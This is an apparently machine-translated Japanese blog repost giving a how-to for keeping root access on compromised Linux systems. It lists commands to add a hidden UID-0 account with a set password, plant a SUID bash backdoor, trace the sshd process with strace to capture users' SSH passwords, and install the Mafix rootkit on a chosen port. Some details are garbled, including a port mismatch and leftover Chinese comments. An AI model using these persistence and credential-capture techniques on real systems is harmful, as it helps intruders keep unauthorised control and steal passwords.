Linux 権限の維持方法

プログラミング 2023-07-19 01:16:58 訪問数: null

Linux 権限の維持方法

1. スーパーユーザーの作成

例えば:

ユーザー名guest、パスワード123456でrootユーザーを作成します。

useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

以下を変更して/etc/passwdスーパーユーザーを作成することもできます。

詳しくはこちらの記事をご覧ください

2. SUIDバックドア権限のメンテナンス

SUID バックドアの必要条件:

  • SUID 権限はバイナリ プログラムに対してのみ有効です
  • 実行者は、このプログラムに対する実行権限を持っている必要があります
  • 権限はプログラムの実行中にのみ有効です
  • 実行プロセス中、実行者はプログラム所有者の権限を持ちます。

ステップ:

  1. SUIDファイルを作成します。.long
  2. バッシュを書く
cp /bin/bash .long #将bash命令cp到.long二进制程序中
chmod 4755 .long #赋予SUID文件的权限
  1. この SUID バックドア ファイルを実行します
./.long -p

ルートシェルを取得する

3.Strace はバックドアを監視します

strace は、他のユーザーを監視して接続できるだけでなく、他のユーザーのパスワードを捕捉するためにも使用できます。

まず、次のコマンドを使用して sshd プロセスの PID を見つける必要があります。

ps -ef | grep sshd

ここに画像の説明を挿入

PIDは31171です

次に、次のコードを実行してトラフィックの取得を開始します。

strace -f -p 31171 -o .ssh.log -e trace=read,write,connect -s 2048

このとき、ssh でのログインやユーザーの切り替えなどの操作を行うと、パスワードがファイルに記録されることになりますが、.ssh.log生成されるログ ファイルが非常に大きくなり、疑惑を抱かれやすいという欠点があります。

4.ルーキットバックドア

Mafix はよく使われる軽量のアプリケーションレベルのルートキットで、ssh プロトコルの脆弱性を突いてリモートログインを実現し、シンプルな構成とカスタマイズ可能な認証パスワードとポート番号が特徴です。

まず Mafix をダウンロードし、ターゲット サーバーにアップロードし、解凍して Mafix ディレクトリに移動し、ルートキットをインストールします。

./root 111111 7777

このうち、111111はバックドアプログラムに接続する際のパスワード、7777は接続ポートです

接続バックドア:

ssh ip -p 777

おすすめ

転載: blog.csdn.net/Gherbirthday0916/article/details/131293134
おすすめ
Apache Doris バージョン 2.0.10 が正式にリリースされました。
Open Source Daily | 大手モデルが戦争に突入、大手モデルのユニコーンが身売りしていることが明らかに; 最大のオープンソース AI コミュニティが GPU の共有に 1,000 万ドルを提供すると示唆
ランキング
ジャンゴ使用KindEditorアップロード写真
FirstOrDefault VS C#の検索
SQL UNIONルール
VS Code は HTML スタートアップを実装し、ホット アップデート サービスを提供します
Linux プログラミング: 1. コルーチンの設計原則
目标检测的“尽头”竟是语言建模?Hinton团队提出Pix2Seq:性能优于DETR
CTFdインストールの新バージョン以降の操作および保守について話します
構造体へのポインタ出力4人の学生学生ID名前性別年齢を使用することにより
1.3.2リリース、連続ファイル同期ツールをSyncthing
PyQt5 インストールチュートリアル
アーカイブ
もっと
2024-05-17(6)
2024-05-16(24)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)

コードワールド

© 2018 codetd.com